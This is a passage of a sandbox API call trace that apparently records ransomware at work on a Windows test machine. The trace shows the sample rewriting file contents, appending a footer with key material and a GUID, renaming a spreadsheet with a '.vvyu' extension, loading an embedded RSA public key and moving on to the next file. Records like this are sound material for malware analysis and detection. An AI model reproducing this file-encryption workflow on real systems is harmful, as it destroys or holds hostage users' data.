HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c58 | out: hHeap=0x6a0000) returned 1 [0190.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0190.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0190.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0190.822] GetCurrentThreadId () returned 0x264 [0190.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0190.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44a20 [0190.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0190.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0190.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0190.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0190.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.823] GetCurrentThreadId () returned 0x264 [0190.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0190.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0190.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0190.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0190.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c58 [0190.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0190.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0190.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0190.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bf8 [0190.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0190.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0190.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0190.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0190.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c10 [0190.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0190.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0190.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0190.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39be0 [0190.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0190.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c70 [0190.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0190.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c40 [0190.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c28 [0190.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c88 [0190.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c28 | out: hHeap=0x6a0000) returned 1 [0190.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c28 [0190.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c40 | out: hHeap=0x6a0000) returned 1 [0190.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0190.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0190.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0190.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bf8 | out: hHeap=0x6a0000) returned 1 [0190.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39bf8 [0190.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0190.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c58 | out: hHeap=0x6a0000) returned 1 [0190.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0190.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c88 | out: hHeap=0x6a0000) returned 1 [0190.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0190.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0190.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0190.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0190.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bf8 | out: hHeap=0x6a0000) returned 1 [0190.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0190.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0190.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0190.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0190.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0190.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0190.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0190.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0190.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c28 | out: hHeap=0x6a0000) returned 1 [0190.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c70 | out: hHeap=0x6a0000) returned 1 [0190.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c10 | out: hHeap=0x6a0000) returned 1 [0190.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39be0 | out: hHeap=0x6a0000) returned 1 [0190.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0190.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bc8 | out: hHeap=0x6a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30a78 | out: hHeap=0x6a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0190.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0190.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0190.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0190.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0190.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0190.836] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x9e92, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x9e92, lpOverlapped=0x0) returned 1 [0190.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.837] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9e97, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.838] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0190.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0190.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0190.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0190.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0190.839] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0190.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.839] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.840] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0190.840] CloseHandle (hObject=0x584) returned 1 [0190.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x794008 [0190.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d45778 [0190.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0190.842] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\PRpouSq\\BBvsts1.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\prpousq\\bbvsts1.xls"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\PRpouSq\\BBvsts1.xls.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\prpousq\\bbvsts1.xls.vvyu")) returned 1 [0190.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.844] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0190.847] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc37971a0, ftCreationTime.dwHighDateTime=0x1d8983e, ftLastAccessTime.dwLowDateTime=0x6d7f22c0, ftLastAccessTime.dwHighDateTime=0x1d8a20e, ftLastWriteTime.dwLowDateTime=0x6d7f22c0, ftLastWriteTime.dwHighDateTime=0x1d8a20e, nFileSizeHigh=0x0, nFileSizeLow=0x14407, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jBc88bXGG.swf", cAlternateFileName="JBC88B~1.SWF")) returned 1 [0190.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0190.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0190.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0190.848] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\PRpouSq\\jBc88bXGG.swf") returned=".swf" [0190.848] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\PRpouSq\\jBc88bXGG.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\prpousq\\jbc88bxgg.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.850] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=82951) returned 1 [0190.850] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0190.853] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x143e1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.853] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0190.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.856] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.856] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x14407, lpOverlapped=0x0) returned 1 [0190.857] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0190.857] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.857] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.857] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0190.858] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0190.858] CryptHashData (hHash=0x2cbfa90, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.858] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0190.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0190.858] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0190.858] GetLastError () returned 0x0 [0190.858] CryptDestroyHash (hHash=0x2cbfa90) returned 1 [0190.858] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0190.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0190.859] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0190.859] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0190.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0190.859] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0190.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14410) returned 0x2d45778 [0190.859] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0190.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0190.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0190.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0190.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30a78 [0190.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bc8 [0190.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30a30 [0190.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39be0 [0190.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c10 [0190.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c70 [0190.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c28 [0190.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0190.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0190.860] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0190.860] RtlAllocateHeap (HeapHandle=0x6a0000, 